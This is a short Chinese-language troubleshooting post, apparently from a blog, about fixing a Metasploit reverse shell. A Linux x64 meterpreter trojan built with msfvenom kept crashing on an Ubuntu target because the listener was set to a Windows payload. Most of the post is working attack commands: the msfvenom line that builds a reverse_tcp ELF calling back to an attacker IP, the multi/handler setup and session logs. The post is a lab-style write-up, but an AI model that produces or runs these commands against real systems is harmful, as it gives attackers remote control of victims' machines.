问题描述
用msf生成Ubuntu 16.04的反向连接木马:
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=172.16.252.129 LPORT=1234 -f elf > shell.elf
开启监听:
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 172.16.252.129
set lport 1234
exploit
另一端靶机上运行shell后显示段错误:
./shell.elf
Segmentation fault (core dumped)
msf攻击机上显示连接session关闭:
[*] Started reverse TCP handler on 172.16.252.129:1235
[*] Sending stage (180291 bytes) to 172.16.252.138
[*] Meterpreter session 2 opened (172.16.252.129:1235 -> 172.16.252.138:55946) at 2020-04-21 21:42:43 -0400
[*] 172.16.252.138 - Meterpreter session 2 closed. Reason: Died
反复连接,反复出错,只见session数一直增加:
解决方法
在网上搜索半天没发现解决方法,最后发现问题是出在msf中监听载荷的设置不一致:
set payload windows/meterpreter/reverse_tcp
应该改为:
set payload linux/x64/meterpreter/reverse_tcp
生成木马时所用载荷需要与监听载荷配置一致。修改后,重新开启监听:
set payload linux/x64/meterpreter/reverse_tcp
exploit
重新运行shell,连接成功: